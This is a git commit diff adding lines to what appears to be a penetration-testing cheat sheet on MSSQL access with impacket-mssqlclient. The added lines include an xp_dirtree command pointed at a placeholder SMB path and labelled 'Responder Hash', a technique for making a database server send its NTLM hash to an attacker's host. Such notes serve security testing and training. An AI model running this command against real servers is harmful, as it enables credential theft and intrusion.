Update README.md

This commit is contained in:
Joe Totes
2022-09-01 13:04:31 -04:00
committed by GitHub
parent 6fd6837fb1
commit 1dfe66e532

View File

@@ -520,6 +520,13 @@ impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} -windows-auth
# {IP ADDRESS}: IP Address of the Server
# {USERNAME}: User Authentication
# {PASSWORD}: Password Authentication
# SQL SHELL
sql> help
# Responder Hash
sql> xp_dirtree "\\{IP ADDRESS}\test"
```